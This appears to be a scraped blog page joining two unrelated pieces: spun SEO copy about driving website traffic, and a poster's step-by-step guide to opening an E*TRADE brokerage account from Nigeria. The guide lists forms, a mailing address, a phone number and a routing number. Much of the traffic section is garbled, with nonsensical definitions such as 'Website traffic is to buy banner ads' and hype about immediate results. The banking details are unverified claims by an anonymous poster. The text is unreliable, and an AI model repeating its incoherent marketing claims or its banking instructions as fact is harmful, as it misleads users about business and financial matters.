Website traffic is more than just a numbers game. In order to succeed online, you must get quality targetted traffic. A great way to do this is through article writing and submission. How to keep traffic coming to your website seo guru tips.

Website traffic is the conversion of the average visitor into a long-term customer. Website traffic is to buy banner ads on websites in my market. This is by far the best, fastest and most predictable form of traffic you can have.
Website traffic is to generate brand familiarity and preference through an emotional association. Brand familiarity will make the customer more likely to associate your product or service with your company, and thus either contact you or buy your product.

There are three main methods to generating ongoing traffic to your website. There is no reason for a potential customer to come back if there’s no new information. New articles, company information, product or service information, images, pdfs, you name it. As long as it’s relevant to your business, put it up there. But what if nothing’s changed? What if your company just does the same thing over and over and over?

Website traffic is exactly what it sounds like – traffic coming in to your website. That is, people choosing to visit your website. Without constant traffic and a lot of it, you will be losing out on a lot of business. You will also not be getting the most out of your website investment itself. Think about it, if you create a website that converts 2. 5% of its visitors into customers, why wouldn’t you try to get more visitors? Your website can handle it. The question is, can you handle the extra load? If it was profitable, and it should be, why wouldn’t you try to get more traffic?

There are many different sources of website traffic, not all of them equal. Not every visitor to your website is even interested in what you have to say or offer. You want targeted and qualified traffic, which means you want visitors to your website who are actually interested and actively searching for what you have. The more qualified the traffic is, the better your conversion rate will be.

Website traffic is normally referred to as participating as an advertiser or content provider on larger websites like ebay or”youtube. Or you could simply trade website links with other synergistic and or complimentary websites in or out of your industry that target the same customer profile. Plus on some social networking websites like facebook, myspace, linkedin or twitter you can list your domain name in your online profile and those viewers can link back to your website.

In addition to borrowing the website traffic that you may get from these large social networks there are other additional search engine optimization (seo) benefits associated with getting incoming links from these high google page ranked websites. However, it is highly recommended that you not participate in link exchanges with link farms that exist primarily for the purpose of artificially boosting your website traffic.

Website traffic is to adjust to the sales or not getting sales your seeing. Our website traffic is so powerful you will see results almost immediately. Get reviews of the top five website traffic providers on the net and get your site making you money in no time.

How To Open a US Bank Account From Nigeria

Posted By Dougyfancy On 15:45 0 comments
If you are doing business online using pay pal, 2Checkout, Storm pay, Click Bank, or any other common payment service, you know how difficult, expensive and time consuming it is to get your fund into your country. I made this article to help people like myself, who searches for an easy way to open a US Bank Account without Social Security Number, without going to the US, and virtually without cost!
Step1: Let me start by Introducing “Financial!” Financial owns Banks and Securities, LLC; this bank has provided excellent and fast customer services. A lot of my like minded friends today have been able to open their bank account within 10 days – and that includes mail delivery from their countries to the USA. You can visit the bank now at www.etrade.com but don’t click to open your account yet! Filling the wrong form will get your application denied. I’ll walk you through the right process in just a minute.
To open your account we will be using the service of securities, LLC- a member of the SIPC( Security Investor Protection Corporation). It is affiliated with Bank-allowing you to have banking service
Step 2: Opening Your Account Offers two accounts and two different forms: the first account is a Checking Account. Non-US residents can’t open this account. The second account is a brokerage account; it works just like a checking account. However, you also have the option to use it for investing (You don’t have to invest if you don’t want to – you can just use it as a checking account). This account is available to residents and non-US residents. This brokerage account allows you to write US checks, have a VISA Platinum Debit Card, and full internet banking. You can also ACH (direct deposit) funds from pay pal, 2CheckOut, Ad sense, or any other US bank.

As a non-US resident you will need to fill out the following forms:
Brokerage Account Application.
Tax Withholding Form (W-8BEN) Tax will not be withheld from your deposit. Tax is only withheld if you make profit on an investment made through Investing. Mail both forms along with a photocopy of your passport to “E*TRADE Securities LLC, P.O.Box 1542Merrifield, VA 22116-1542USA”.
Step 3: Ordering Your FREE checkbook. You can phone and request your checkbook before receiving your welcome kit, and even before any fund have been deposited into your account. Just call them on 1-916-636-2510.Alternatively; you can wait to request a checkbook after you receive your welcome pack. You can also ask for your account details over the phone and login to your bank account. YOU DO NOT have to wait for your welcome pack to access your account and deposit funds.
Step 4: Initial Deposit. you can fund your account by including a US check money order with your application. However, if you are including a check order, it will need to be at least in the amount of $1,000.Or………..You can fund your account in any amount via Pay pal, 2CheckOut or any other account via ACH (direct deposit). Initial deposits can be $10 sent from pay pal. You can also wire funds, in any amount, from your home bank account.

Step 5; Requesting Your Visa Debit Card. Your welcome pack will arrive in approximately 2 weeks. It will include a simple form to request your Platinum VISA debit card. Please note; you will need a minimum balance of $1,000(US) before you can request your VISA card. After you have opened Your Account; Once your account is open you are now ready to add your details to pay pal, Ad sense, or any other place you want to receive ACH (direct debits) from. Just enter the following details to transfer funds into your new US account.
Bank name: ETRADE BANK
Routing number: 056073573
Accounting type: Checking Account
Account number: Your personal account number.
*ACH (direct transfer) is different from a wire transfer; A wire transfer has different routing number and usually used for International Transfer. Enjoy banking in the USA!
Here is the link for this Complete Investment (Brokerage) Account:
http://us.etrade.com/e/t/microsite/custwelcome?SC
thanks to BIZSTUFFS PORTALs>.

Popular Posts